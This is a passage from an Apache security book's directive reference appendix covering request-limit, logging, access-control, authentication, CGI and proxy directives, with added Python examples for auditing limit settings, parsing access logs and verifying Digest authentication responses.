previously assigned to a log format you specified with the LogFormat directive.


• env is an environment variable that you specify. This lets you control Apache’s
logging behavior conditionally on what environment variable(s) occupy the
request or transfer body.


To learn more, see Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


IdentityCheck 


The IdentityCheck directive, included as a core feature, enables RFC 1413-style 
logging of remote user names. This comprises Apache’s support of the identification 
or ident protocol, previously known as the Authentication Server Protocol. 


ident user ID tracking is unreliable, chiefly because few hosts today run ident. 
Historical ident servers listened for TCP-based requests on port 113. They responded 
to properly formatted queries by returning the connection’s associated user ID. That 
is, the ident server on the client system would reply to interested servers with the 
user ID that initiated the session from the client. 


NOTE 


Using IdentityCheck is generally not worth the trouble, for two reasons: First, as I related
previously, few systems run ident today. Hence, Apache may waste considerable resources 
only to reap no results. (After all, systems with no ident server running cannot provide user 
IDs.) Second, even when remote client systems do run ident, the query process can take 
some time: 10 seconds, 30 seconds, a minute, and so on. 
Syntax is:


IdentityCheck state 


state is on or off. 


Learn more in Chapter 11, “Apache and Authentication: Who Goes There?” 


LimitRequestBody 

The LimitRequestBody directive, included in Apache’s core system, lets you limit the 
client’s request body to a specific size. (This functionality is only available in versions 
1.3.2 and later.) 


Syntax is: 


LimitRequestBody value 


value is a numeric value that you specify. This could be 0, which represents an 
unlimited request body size, all the way up to 2 gigabytes, although few request 
bodies will come anywhere near 2 gigs. Certain denial-of-service attacks (and other 
malicious actions) often require attackers to send impossibly long strings in their URI 
requests. LimitRequestBody offers you a mechanism by which to prevent such 
attacks. 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


LimitRequestFields 

The LimitRequestFields directive, included in Apache’s core system, lets you limit 
the number of request fields a client can send in its request. This functionality is 
only available in versions 1.3.2 and later. 


Syntax is: 

LimitRequestFields value

value is a numeric value that you specify. This could be 0, which represents an
unlimited number of request fields, all the way up to 32767. Certain denial-of-service
attacks (and other malicious actions) often require attackers to send overwhelming
request headers in their requests. LimitRequestFields offers you a mechanism by
which to prevent such attacks by controlling the number of request fields.


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 
LimitRequestFieldsize


The LimitRequestFieldsize directive, included in Apache’s core system, lets you 
limit the client’s request field size. This functionality is only available in versions 
1.3.2 and later. 


Syntax is: 

LimitRequestFieldsize value 

value is a numeric value that you specify. This could be 0, which represents an
unlimited request field size, all the way up to 8190 bytes. Certain denial-of-service
attacks and other malicious actions require attackers to send impossibly long strings
in their URI fields. LimitRequestFieldsize offers you a mechanism by which to
prevent such attacks.


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


LimitRequestLine 


The LimitRequestLine directive, included in Apache’s core system, lets you limit the 
client’s request line size to a value less than the compiled-in default (8190). This 
functionality is only available in versions 1.3.2 and later. 


Syntax is: 

LimitRequestLine value 

value is a numeric value that you specify. This could be 0, which represents an
unlimited request line size, all the way up to 8189 bytes. Certain denial-of-service
attacks and other malicious actions require attackers to send impossibly long strings
in their request lines. LimitRequestLine offers you a mechanism by which to
prevent such attacks.


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


LimitXMLRequestBody 


The LimitXMLRequestBody directive, included in Apache’s core system, lets you limit 
the client’s XML request body size. 


Syntax is straight-ahead: 


LimitXMLRequestBody value 


value is a value you specify in bytes, and this value could be anything. 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 
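The request-limit directives above only help if they are actually set, so here is a small audit script, added for this appendix rather than taken from the book, that reads an httpd.conf fragment and reports, for each of LimitRequestBody, LimitRequestFields, LimitRequestFieldsize, LimitRequestLine, and LimitXMLRequestBody, whether the limit is configured, falls back to the compiled-in default, is 0 (unlimited), or exceeds the ceiling stated above. The compiled-in defaults in the table are those of Apache 1.3/2.0 as I know them, the ceilings are the ones this appendix gives, and the configuration text is constructed.

```python
import re

# Compiled-in defaults (Apache 1.3/2.0, editor's assumption; 0 = unlimited)
# and the maximum values this appendix gives for each directive.
DIRECTIVES = {
    "LimitRequestBody":      {"default": 0,       "max": 2147483647},  # "up to 2 gigabytes"
    "LimitRequestFields":    {"default": 100,     "max": 32767},
    "LimitRequestFieldsize": {"default": 8190,    "max": 8190},
    "LimitRequestLine":      {"default": 8190,    "max": 8190},        # compiled-in default
    "LimitXMLRequestBody":   {"default": 1000000, "max": None},        # no documented ceiling
}

# Directive names are case-insensitive in httpd.conf, and the directive may be
# indented inside a <Directory> or <Location> block.
_LIMIT_LINE = re.compile(r"^\s*(Limit(?:XML)?Request[A-Za-z]+)\s+(\d+)\s*$")
_CANONICAL = {name.lower(): name for name in DIRECTIVES}


def parse_limits(conf_text):
    """Return {directive: value} for the limit directives found in conf_text.

    Comments are stripped; the last occurrence of a directive wins (the script
    does not model per-section scoping, it just finds what is set).
    """
    found = {}
    for raw in conf_text.splitlines():
        code = raw.split("#", 1)[0]
        match = _LIMIT_LINE.match(code)
        if match is None:
            continue
        name = _CANONICAL.get(match.group(1).lower())
        if name is not None:
            found[name] = int(match.group(2))
    return found


def audit_limits(conf_text):
    """Return one (directive, effective_value, source, finding) tuple per directive.

    source is "configured" or "default"; finding is "unlimited" for a value of 0,
    "exceeds maximum N" for a value above the appendix's ceiling, else "bounded".
    """
    configured = parse_limits(conf_text)
    report = []
    for name, spec in DIRECTIVES.items():
        if name in configured:
            value, source = configured[name], "configured"
        else:
            value, source = spec["default"], "default"
        if value == 0:
            finding = "unlimited"
        elif spec["max"] is not None and value > spec["max"]:
            finding = "exceeds maximum %d" % spec["max"]
        else:
            finding = "bounded"
        report.append((name, value, source, finding))
    return report


# Constructed httpd.conf fragment (not a real configuration): the body limit is
# explicitly disabled, the field count is tightened, and the line limit is set
# above the compiled-in ceiling; the field-size directive is commented out.
SAMPLE_CONF = """\
ServerRoot /etc/httpd
LimitRequestBody 0          # 0 = unlimited request bodies
LimitRequestFields 50
<Directory /var/www/html>
    LimitRequestLine 9000   # larger than the compiled-in default of 8190
</Directory>
# LimitRequestFieldsize 4094
"""

if __name__ == "__main__":
    for name, value, source, finding in audit_limits(SAMPLE_CONF):
        print("%-22s %11d  (%s)  %s" % (name, value, source, finding))
```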
LockFile


The LockFile directive lets you set the lockfile’s path.


Syntax is: 


LockFile path 


path here is the directory path leading to the lockfile. 


NOTE 


Remember that you must store the lockfile in a real directory on the local hard disk drive. Do 
not try to NFS your lockfile. 





Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


LogFormat 


The LogFormat directive, available in mod_log_config, lets you specify what data 
Apache should log and how to format it. 


Syntax is: 

LogFormat format-directives|nickname

format-directives is a list that describes each data element that Apache will record.
nickname is a label with which to associate the specified format data element list.


(This way, you needn’t articulate the list again and again when communicating it to 
other directives. Instead, you can simply use the nickname.) 


Table A.1 below lists Apache LogFormat directives and what they signify. 


TABLE A.1 httpd LogFormat Directives

Directive     What It Does

%e            Defines the specified environment variable.
%b            Records the total number of bytes sent (not including headers).
%f            Records the filename requested.
%h            Records the remote host’s address.
%l            Records the logname (username) of the client’s user (if they’re
              running ident).
%P            Records the PID of the process that satisfied the client’s request.
%p            Records the port that the server directed the response to.
%r            Records the first line of the client’s request.
%s            Records the status of the client’s request.
%t            Records the time of the request.
%T            Records the time taken to satisfy the client’s request.
%u            Records the remote user (using auth).
%U            Records the URL that the client initially requested.
%v            Records the virtual host’s hostname.


Here’s the default: 


LogFormat "%h %l %u %t \"%r\" %s %b" 


This indicates that by default, Apache would log:


• The remote host address

• The remote logname (unreliable and available only if the client box is running
ident)

• The remote user (unreliable also)

• The time (standard log format, for example Wed Dec 12 14:55:49 PST 2001)

• The client’s first request

• The status

• The bytes sent


To learn more, see Chapter 9, “Spotting Crackers: Apache Logging Facilities.”
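To show what those default fields look like when they come back out of the access log, here is a parser for lines written with that default LogFormat, added here as an example and not taken from the book. It maps each field to the directive in Table A.1 (a bare - means the field was not available, the usual case for %l and %u) and then tallies, per client host, the error responses and the over-long request lines that the LimitRequestLine discussion earlier in this appendix is concerned with. The log lines are constructed.

```python
import re
from datetime import datetime

# One regex for the default format: %h %l %u %t "%r" %s %b.
# %t is bracketed, and %r may contain backslash-escaped quotes.
COMMON_LOG = re.compile(
    r'^(?P<h>\S+) (?P<l>\S+) (?P<u>\S+) \[(?P<t>[^\]]+)\] '
    r'"(?P<r>(?:[^"\\]|\\.)*)" (?P<s>\d{3}) (?P<b>\d+|-)$'
)


def parse_common_log_line(line):
    """Parse one default-format access log line into a dict, or return None.

    Keys mirror the LogFormat directives: host (%h), logname (%l), user (%u),
    time (%t), request (%r), status (%s) and bytes (%b). A "-" in %l or %u
    becomes None and in %b becomes 0; the request line is split into method,
    uri and protocol when it has the expected three parts.
    """
    match = COMMON_LOG.match(line.rstrip("\r\n"))
    if match is None:
        return None
    f = match.groupdict()
    request = f["r"].replace('\\"', '"')
    parts = request.split(" ")
    record = {
        "host": f["h"],
        "logname": None if f["l"] == "-" else f["l"],
        "user": None if f["u"] == "-" else f["u"],
        "time": datetime.strptime(f["t"], "%d/%b/%Y:%H:%M:%S %z"),
        "request": request,
        "status": int(f["s"]),
        "bytes": 0 if f["b"] == "-" else int(f["b"]),
        "method": None, "uri": None, "protocol": None,
    }
    if len(parts) == 3:
        record["method"], record["uri"], record["protocol"] = parts
    return record


def summarize(lines, max_request_len=512):
    """Tally requests, 4xx/5xx responses and over-long request lines per host.

    Returns (per_host, unparsed): per_host maps a client address to counters,
    unparsed counts lines that did not match the default format (a sign of a
    different LogFormat in use, or of a corrupted log).
    """
    per_host = {}
    unparsed = 0
    for line in lines:
        record = parse_common_log_line(line)
        if record is None:
            unparsed += 1
            continue
        counters = per_host.setdefault(
            record["host"], {"requests": 0, "errors": 0, "long_requests": 0})
        counters["requests"] += 1
        if record["status"] >= 400:
            counters["errors"] += 1
        if len(record["request"]) > max_request_len:
            counters["long_requests"] += 1
    return per_host, unparsed


# Constructed sample lines (not real traffic), in the default format.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2001:14:55:49 -0800] "GET /index.html HTTP/1.0" 200 2326',
    '10.0.0.5 - nicole [12/Dec/2001:14:56:02 -0800] "GET /~nicole/ HTTP/1.0" 401 401',
    '10.0.0.9 - - [12/Dec/2001:14:57:10 -0800] "GET /cgi-bin/test-cgi?'
    + "A" * 600 + ' HTTP/1.0" 404 -',
    'this line is not in the default format',
]

if __name__ == "__main__":
    per_host, unparsed = summarize(SAMPLE_LOG)
    for host, counters in sorted(per_host.items()):
        print(host, counters)
    print("unparsed lines:", unparsed)
```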


mod_access 
mod_access provides access control based on client hostname or IP address. 


mod_access provides this access control through .htaccess files and within 
<Directory>, <Files>, and <Location> directive blocks. 


mod_access directives for controlling access are as follows: 


• Allow—This specifies that Apache should allow users from a domain name,
partial domain name, full IP address, partial IP address, or network range you
specify.


• Deny—This specifies that Apache should deny users from a domain name,
partial domain name, full IP address, partial IP address, or network range you
specify.


• Order—This lets you specify the order in which Apache processes your Allow
and Deny directives. That order can be Deny, Allow (Deny directives first),
Allow, Deny (Allow directives first), or Mutual-failure, which is essentially
Allow, Deny.


Learn more in Chapter 10, “Apache Network Access Control.” 


mod_auth 


mod_auth manages HTTP Basic authentication using plain text password and group 
files in the .htpasswd system. With Basic authentication, Apache queries .htaccess 
files. These store your access rules and file locations. 


Here’s a sample .htaccess file: 


AuthUserFile /home/Nicole/public_html/.htpasswd 
AuthGroupFile /dev/null 

AuthName Nicole 

AuthType Basic 


<Limit GET POST> 
require user nicole 
</Limit> 


The file contains five directives and their corresponding values: 


• AuthUserFile—The AuthUserFile directive points to the location of the
.htpasswd database. When you set AuthUserFile, specify the full path to
.htpasswd.


• AuthGroupFile—The AuthGroupFile directive points to the location of your
group access file (normally .htgroup). In this simple example, no group file
exists, so that value is set via the AuthGroupFile directive to /dev/null.


• AuthName—The AuthName directive stores a user-defined text string to display
when the authentication dialog box appears. When users request access, they
see a username/password prompt. The caption requests that they Enter
Username for AuthName at hostname. While the server fills in the hostname
variable, you must specify the AuthName variable’s value.


• AuthType—The AuthType directive identifies the authentication method. The
previous example specifies Basic authentication, the most commonly used and
simplest type.


• Limit—The Limit directive controls which users are allowed access, what type
of access they can obtain (for example, GET, PUT, and POST), and the order in
which Apache evaluates these rules.


The Limit directive’s four internal directives refine controls:


• require—The require directive specifies which users or groups can access the
password-protected directory. Valid choices are explicitly named users, explicitly
named user groups, or any valid user in .htpasswd. In the previous
example, the require directive limits access to user nicole (require user
nicole).


• allow—The allow directive controls which hosts can access the password-protected
directory. Syntax is allow from host1 host2 host3. You can specify
these hosts by hostname, IP address, or partial IP addresses.


• deny—The deny directive specifies which hosts are prohibited from accessing
the password-protected directory. Syntax is deny from host1 host2 host3.
Again, you can specify hosts by their fully qualified hostnames, IP addresses, or
partial IP addresses.


• order—The order directive controls the order in which the server will evaluate
access rules. Syntax is deny, allow (deny rules are processed first), or allow,
deny (allow rules are processed first).


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


mod_auth_anon 


mod_auth_anon provides anonymous user management, and lets you specify if, how, 
and where anonymous users gain entry to password-protected directories. 


mod_auth_anon supports six directives: 


• Anonymous—The Anonymous directive, included in mod_auth_anon, grants
anonymous users access to password-protected areas. See the Anonymous section
earlier in this appendix or Chapter 11 for more information.


• Anonymous_Authoritative—The Anonymous_Authoritative directive, when set
to on, denies access to all but anonymous users or user IDs. See the
Anonymous_Authoritative section earlier in this appendix or Chapter 11 for
more information.


• Anonymous_LogEmail—Anonymous_LogEmail, when set to on, logs passwords
that anonymous users provide to error_log. See the Anonymous_LogEmail
section earlier in this appendix or Chapter 11 for more information.


• Anonymous_MustGiveEmail—The Anonymous_MustGiveEmail directive, when set
to on, requires anonymous users to supply their e-mail addresses as passwords.
See the Anonymous_MustGiveEmail section earlier in this appendix or Chapter
11 for more information.


• Anonymous_NoUserID—The Anonymous_NoUserID directive, when set to on,
allows users access without supplying a user ID. See the Anonymous_NoUserID
section earlier in this appendix or Chapter 11 for more information.


• Anonymous_VerifyEmail—The Anonymous_VerifyEmail directive, when set to on,
instructs Apache to verify—or try to verify—that visitors supply a valid e-mail
address. See the Anonymous_VerifyEmail section earlier in this appendix or
Chapter 11 for more information.


mod_auth_db 


mod_auth_db provides user authorization through Berkeley DB (instead of DBM) files. 
mod_auth_db’s directives are as follows: 


• AuthDBGroupFile—The AuthDBGroupFile directive lets you specify a file that
contains group authorization information.


• AuthDBUserFile—The AuthDBUserFile directive lets you specify the DB file’s
name. Such files contain username/password pairs for use in DB-based
authentication. See the AuthDBUserFile section earlier in this appendix or Chapter 11
for more information.


• AuthDBAuthoritative—The AuthDBAuthoritative directive lets you specify
whether Apache can pass authorization procedures to lower-level modules
instead of using simple DB-based authentication. See the AuthDBAuthoritative
section earlier in this appendix or Chapter 11 for more information.


mod_auth_dbm 


mod_auth_dbm provides user authorization through DBM files. mod_auth_dbm’s
directives are as follows:


• AuthDBMAuthoritative—The AuthDBMAuthoritative directive lets you specify
whether Apache can pass authorization procedures to lower-level modules
instead of using simple DBM-based authentication. See the
AuthDBMAuthoritative section earlier in this appendix or Chapter 11 for more
information.


• AuthDBMGroupFile—The AuthDBMGroupFile directive lets you specify a file that
contains group authorization information. See the AuthDBMGroupFile section
earlier in this appendix or Chapter 11 for more information.


• AuthDBMUserFile—The AuthDBMUserFile directive lets you specify the DBM file’s
name. Such files contain username/password pairs for use in DBM-based
authentication. See the AuthDBMUserFile section earlier in this appendix or
Chapter 11 for more information.


mod_auth_digest


mod_auth_digest provides authentication through use of message digest algorithms.
Currently, above and beyond Basic-type authentication, Apache supports digest-based
cryptographic authentication using MD5. MD5 belongs to a family of one-way
hash functions called message digest algorithms, and was originally defined in RFC
1321:


The algorithm [MD5] takes as input a message of arbitrary length and produces as output a
128-bit “fingerprint” or “message digest” of the input. It is conjectured that it is
computationally infeasible to produce two messages having the same message digest, or to produce
any message having a given prespecified target message digest. The MD5 algorithm is
intended for digital signature applications, where a large file must be “compressed” in a
secure manner before being encrypted with a private (secret) key under a public-key
cryptosystem such as RSA.


NOTE 
RFC 1321 is located at http://www.thefrog.com/source/rfc1321.txt.


Apache provides digest authentication through the htdigest system. htdigest—the 
main application in the digest scheme—works in a similar fashion as htpasswd. 
Using it, you create a new digest database (.htdigest). Once you specify your rules 
for digest authentication, all further authentications will be digest-based. 


mod_auth_digest supports the following directives: 


• AuthDigestAlgorithm—The AuthDigestAlgorithm directive allows you to
specify the hash algorithm to be used. Currently, the choices are MD5 and
MD5-sess (although Apache documentation reports that MD5-sess is not yet
fully supported).


• AuthDigestDomain—The AuthDigestDomain directive lets you specify one or
more domains that share realm, username, and password information for use
in digest authentication.


• AuthDigestFile—The AuthDigestFile directive lets you specify the file that
contains access control lists for use in digest authentication.


• AuthDigestGroupFile—The AuthDigestGroupFile directive lets you specify the
file that contains groups and users within those groups that are subject to
digest authentication.


• AuthDigestNcCheck—The AuthDigestNcCheck directive is not yet implemented.


• AuthDigestNonceFormat—The AuthDigestNonceFormat directive is not
implemented yet.


• AuthDigestNonceLifetime—The AuthDigestNonceLifetime directive is not
implemented yet in 2.0.


• AuthDigestQop—The AuthDigestQop directive lets you specify the depth of
digest protection for sessions. For example, this can be simply username/password
authentication, or Apache can apply MD5 session integrity checking, too.


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 
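The relationship between the htdigest database and the Digest exchange described above fits in a few lines. The following is an added example, not the book’s or Apache’s code: it builds the .htdigest entry (user:realm:MD5(user:realm:password)), and it performs the server-side response check from RFC 2617 both without a qop and with the qop=auth protection that AuthDigestQop selects, using the worked values from RFC 2617 section 3.5 as the test vector. The file contents and helper names are my own, and only the plain MD5 algorithm (not MD5-sess) is covered.

```python
import hashlib
import hmac


def _md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def htdigest_entry(user, realm, password):
    """Return the line htdigest writes for user/realm: user:realm:HA1.

    HA1 = MD5(user:realm:password). The password itself is never stored, but
    HA1 alone is enough to answer a digest challenge for that realm, so the
    file deserves the same protection as .htpasswd.
    """
    return "%s:%s:%s" % (user, realm, _md5_hex("%s:%s:%s" % (user, realm, password)))


def load_htdigest(text):
    """Parse .htdigest text into {(user, realm): HA1}, skipping blanks and comments."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, realm, ha1 = line.split(":", 2)
        entries[(user, realm)] = ha1
    return entries


def digest_response(ha1, method, uri, nonce, qop=None, nc=None, cnonce=None):
    """Compute the RFC 2617 response the client sends and the server recomputes.

    Without qop (RFC 2069 style): MD5(HA1:nonce:HA2)
    With qop=auth:                 MD5(HA1:nonce:nc:cnonce:qop:HA2)
    where HA2 = MD5(method:uri).
    """
    ha2 = _md5_hex("%s:%s" % (method, uri))
    if qop is None:
        return _md5_hex("%s:%s:%s" % (ha1, nonce, ha2))
    return _md5_hex("%s:%s:%s:%s:%s:%s" % (ha1, nonce, nc, cnonce, qop, ha2))


def verify_digest(entries, user, realm, method, uri, nonce, response, **qop_fields):
    """Server-side check: look up HA1 and compare the recomputed response.

    The comparison is constant-time, and an unknown user/realm pair fails
    closed. Nonce freshness and nonce-count checking are out of scope here.
    """
    ha1 = entries.get((user, realm))
    if ha1 is None:
        return False
    expected = digest_response(ha1, method, uri, nonce, **qop_fields)
    return hmac.compare_digest(expected, response)


# Constructed .htdigest contents built from the RFC 2617 section 3.5 example
# credentials (user Mufasa, realm testrealm@host.com, password "Circle Of Life").
SAMPLE_HTDIGEST = "\n".join([
    "# constructed example file",
    htdigest_entry("Mufasa", "testrealm@host.com", "Circle Of Life"),
])

if __name__ == "__main__":
    entries = load_htdigest(SAMPLE_HTDIGEST)
    ok = verify_digest(entries, "Mufasa", "testrealm@host.com", "GET", "/dir/index.html",
                       "dcd98b7102dd2f0e8b11d0f600bfb0c093",
                       "6629fae49393a05397450978507c4ef1",
                       qop="auth", nc="00000001", cnonce="0a4f113b")
    print("RFC 2617 example response verifies:", ok)
```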


mod_auth_ldap 


mod_auth_ldap authenticates clients via user entries in a Lightweight Directory 
Access Protocol (LDAP) directory. mod_auth_ldap supports the following directives: 


• AuthLDAPAuthoritative—The AuthLDAPAuthoritative directive lets you specify
if Apache can pass authorization procedures to lower-level modules instead of
using simple LDAP-based authentication.


• AuthLDAPBindDN—The AuthLDAPBindDN directive lets you set an optional
distinguished name when binding to the server.


• AuthLDAPBindPassword—The AuthLDAPBindPassword directive lets you set a bind
password for the bind distinguished name.


• AuthLDAPCompareDNOnServer—The AuthLDAPCompareDNOnServer directive forces an
authoritative comparison of the server DN and the remote-specified DN.


• AuthLDAPDereferenceAliases—The AuthLDAPDereferenceAliases directive
specifies when mod_auth_ldap will de-reference aliases during LDAP operations.


• AuthLDAPEnabled—The AuthLDAPEnabled directive lets you incisively specify—
within your directory tree—which directories should or shouldn’t use LDAP.


• AuthLDAPFrontPageHack—The AuthLDAPFrontPageHack directive accommodates
FrontPage-centric user/group files that, under ordinary conditions, interfere
with LDAP authentication and, in certain cases, break it.


• AuthLDAPGroupAttribute—The AuthLDAPGroupAttribute directive specifies
which LDAP attributes Apache should use to evaluate group membership.


• AuthLDAPGroupAttributeIsDN—The AuthLDAPGroupAttributeIsDN directive informs
Apache to use the distinguished name of the client username when checking
for group membership.


• AuthLDAPRemoteUserIsDN—If the AuthLDAPRemoteUserIsDN directive is enabled,
Apache will set the REMOTE_USER environment variable to the full distinguished
name of the authenticated user.


• AuthLDAPStartTLS—If the AuthLDAPStartTLS directive is set, mod_auth_ldap
establishes a secure TLS session after connecting to the LDAP server.


• AuthLDAPUrl—The AuthLDAPUrl directive stores an RFC 2255 URL that
articulates what LDAP parameters to use.


To learn more, see Chapter 11, “Apache and Authentication: Who Goes There?” 


mod_cgi 


mod_cgi provides Common Gateway Interface program execution. The Common 
Gateway Interface (CGI) is a standard that specifies how Web servers use external 
applications to pass dynamic information to Web clients. 


mod_cgi supports the following directives:


• ScriptLog—The ScriptLog directive lets you specify the CGI script error
logfile.


• ScriptLogLength—The ScriptLogLength directive lets you limit the CGI error
log’s size.


• ScriptLogBuffer—The ScriptLogBuffer directive lets you limit PUT and POST
entity bodies to a particular size, thus preventing them from flooding your log.


Learn more in Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


mod_cgid 

mod_cgid provides CGI program execution. mod_cgid eliminates the need for internal 
forking on Unix systems that can’t afford the overhead. mod_cgid accomplishes this 
by establishing an external daemon that handles forking, thus shifting the load from 
Unix. 


mod_cgid supports the following directives: 


• ScriptLog—The ScriptLog directive lets you specify the CGI script error
logfile.


• ScriptLogLength—The ScriptLogLength directive lets you limit the CGI error
log’s size.


• ScriptLogBuffer—The ScriptLogBuffer directive lets you limit PUT and POST
entity bodies to a particular size, thus preventing them from flooding your log.


• ScriptSock—The ScriptSock directive lets you specify the CGI daemon’s
socket’s name.


Learn more in Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


mod_env 


mod_env handles the passing of environment variables to CGI programs and Server- 
Side includes (SSI). 


mod_env supports the following directives: 


• PassEnv—The PassEnv directive will pass one or several environment variables
to CGI or SSI from the httpd invoker’s shell.


• SetEnv—The SetEnv directive statically sets an environment variable before
Apache passes it to CGI or SSI.


• UnsetEnv—The UnsetEnv directive prunes one or several environment variables
from the list that will subsequently pass to CGI or SSI.


Learn more in Chapter 4, “Environmental Hazards: Apache and Your Operating 
System.” 


mod_include 


mod_include provides Server-Side Include (SSI) support, a system that allows 
Webmasters to include on-the-fly information in HTML documents without actually 
writing CGI programs. 


SSI does this using HTML-based directives. These are commands that you embed in 
HTML documents. When Web clients request such documents, Apache parses and 
executes those commands. 


Here’s an example using the config timefmt directive that reports time and date: 


<html>

The current date and time is:
<!--#config timefmt="%B %e %Y"-->
<!--#echo var="DATE_LOCAL"-->
</html>


When a Web browser calls this document, the server will capture the local host’s
date and time and output the following:


The current date and time is:
Monday, 14-Jun-99 11:47:37 PST


Similarly, SSI allows you to cleanly include additional HTML documents into the
final output, such as headers and footers.


Learn more in Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


mod_log_config 
mod_log_config provides Apache logging capabilities and supports four directives: 


• CookieLog—The CookieLog directive lets you specify the cookie log filename.
Apache will log cookie data to this file.


• CustomLog—The CustomLog directive lets you set a log filename, a log format,
and a conditional environment variable for logging.


• LogFormat—The LogFormat directive lets you specify what data Apache should
log and how to format it.


• TransferLog—The TransferLog directive lets you specify the name of a file
that Apache will echo user access logs to.


Learn more in Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


mod_suexec 


mod_suexec provides support for running CGI scripts as a specified User and Group. 
This eliminates many CGI security issues, for it enables you to more incisively 
control script permissions. 


Syntax is: 

SuexecUserGroup user group 

user is whatever username you specify (and this must be a valid user). group is whatever
group you specify.


Learn more in Chapter 12, “Hacking Secure Code: Apache at Server Side.” 


mod_unique_id 


mod_unique_id provides an environment variable ($UNIQUE_ID) with a unique identifier
for each request. This permits machines (and humans in certain instances) to
ascertain which host and which httpd process generated a specific request. If you
load mod_unique_id, Apache will fill in $UNIQUE_ID with a unique 19-character value
composed of a 32-bit IP address, a 32-bit pid, a 32-bit time stamp, and a 16-bit
counter. For more information, see Chapter 12, “Hacking Secure Code: Apache at
Server Side.”


mod_usertrack


mod_usertrack provides tracking of user preferences and behavior through cookies.
Once called the cookie module, mod_usertrack’s directives are as follows:


• CookieDomain—The CookieDomain directive lets you specify the domain to
which set cookies apply. See the CookieDomain section earlier in this appendix
or Chapter 11.


• CookieExpires—The CookieExpires directive lets you specify the time when a
cookie expires. CookieExpires offers wide latitude, allowing you to set the time
in seconds, minutes, hours, weeks, months, or years. See the CookieExpires
section earlier in this appendix or Chapter 11.


• CookieName—The CookieName directive lets you specify a cookie’s name (the
default is Apache). See the CookieName section earlier in this appendix or
Chapter 11.


• CookieStyle—The CookieStyle directive lets you specify the style of cookie to
set, such as Netscape, RFC 2109, or RFC 2965. See the CookieStyle section
earlier in this appendix or Chapter 11.


• CookieTracking—The CookieTracking directive lets you specify whether
Apache should perform cookie tracking (and generate a cookie for each new
client request). See the CookieTracking section earlier in this appendix or
Chapter 11.


PassEnv 


The PassEnv directive, available in mod_env, will pass one or several environment 
variables to CGI or SSI from the httpd invoker’s shell. 


Syntax is: 


PassEnv environment-variable

environment-variable, in this case, is any shell environment variable, including but not limited to BASH, BASH_ENV, BASH_VERSION, COLUMNS, EUID, HISTFILE, HISTFILESIZE, HISTSIZE, HOME, HOSTNAME, HOSTTYPE, IFS, INPUTRC, LANG, LD_LIBRARY_PATH, LOGNAME, MAIL, MAILCHECK, OPTERR, OPTIND, OSTYPE, PATH, PPID, PS1, PS2, PS4, PWD, QTDIR, SHELL, SHLVL, TERM, UID, USER, or USERNAME.

Learn more in Chapter 4, “Environmental Hazards: Apache and Your Operating System.”


PidFile 
The PidFile directive lets you specify a file that stores httpd’s process ID. 
Syntax is: 


PidFile filename 


Note that filename is relative to ServerRoot, unless you precede it by a slash. 


ProxyBlock 


The ProxyBlock directive lets you specify a list of words, hosts, or domains that the 
proxy server will block. 


Syntax is: 


ProxyBlock state 


state can be one of four things:

• *—Block all sites

• word—Block hosts whose hostnames contain the word

• host—Block the specified host

• domain—Block the specified domain


ProxyDomain 


The ProxyDomain directive specifies the default domain that the Apache proxy server 
will belong to. 


Syntax is: 
ProxyDomain domain 


domain is generally a single domain, which you specify by its root hostname, 
preceded by a dot: .foo.com. 


ProxyReceiveBufferSize 


The ProxyReceiveBufferSize directive, included in mod_proxy, lets you define the 
network buffer size for outgoing HTTP and FTP connections. 
Syntax is:


ProxyReceiveBufferSize size 


size is the explicit size you specify (for example, 2048). 


ProxyRemote 


The ProxyRemote directive, included in mod_proxy, lets you define remote proxies to 
the local host (which functions as a proxy). 


Syntax is: 


ProxyRemote match remote-server 


remote-server here is a declaration with three tiers: 


• protocol—This defines the protocol. Only HTTP is supported, but Apache can perform FTP transfers via HTTP.

• hostname—The remote proxy’s hostname (www.foo.com).

• port—The port on which to communicate with the remote host.


For example: 


ProxyRemote ftp http://host2.com:8080 


This defines the protocol (ftp), the hostname (host2.com) and the port (8080). 


ProxyRequests 


The ProxyRequests directive, included in mod_proxy, enables or disables Apache as a 
proxy server. 


Syntax is: 


ProxyRequests state 


state is on (enable Apache as a proxy server) or off (don’t). 


ProxyVia 


The ProxyVia directive, included in mod_proxy, lets you control proxy request flow, 
and whether Apache generates or passes on RFC 2058 Via headers. 
Options are:

• Block—Here, Apache removes all proxy Via headers.

• Full—This appends your Apache version to each successive proxy Via header.

• Off—This is the default. Apache does nothing.

• On—Here, Apache generates a new Via header for each new request.


Syntax is: 


ProxyVia On | Off | Full | Block 


ServerAdmin 


The ServerAdmin directive, included as a core feature, lets you specify your administrative e-mail address. Apache displays this address to clients in error or other administrative messages.


Syntax is: 


ServerAdmin email-address 


email-address is whatever address you specify. Typical examples are
webmaster@foo.com, root@foo.com, problems@foo.com, and so forth. It’s probably 
wise to dedicate an address expressly for this purpose (and not specify a common 
address that you regularly use for mail), because users that use it will invariably refer 
to problems restricted solely to your Apache server (and not your mail, DNS, or other 
daemons). This is an especially good idea if you have high traffic. 


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


ServerAlias 


The ServerAlias directive, included as a core feature, identifies your server by its 
name or domain name or, in certain situations, by its IP address. 


Syntax is:

ServerAlias name

name is one name or several that you specify. ServerAlias handles multiple hostnames in virtual host configurations. To learn more, see Chapter 8, “Overlording Apache Server: General Administration.”

ServerName


The ServerName directive, included as a core feature, identifies your server by its 
name or domain name or, in certain situations, by its IP address. 


Syntax is: 

ServerName name 

name is whatever name you specify (for example, www.foo.com). ServerName works not merely on the system’s default site, but also any virtual hosts you administrate with Apache. Several significant security and administrative issues arise with ServerName’s use, depending on how you configure your DNS (or if you don’t have locally-managed DNS).


Learn more in Chapter 8, “Overlording Apache Server: General Administration.” 


ServerPath 


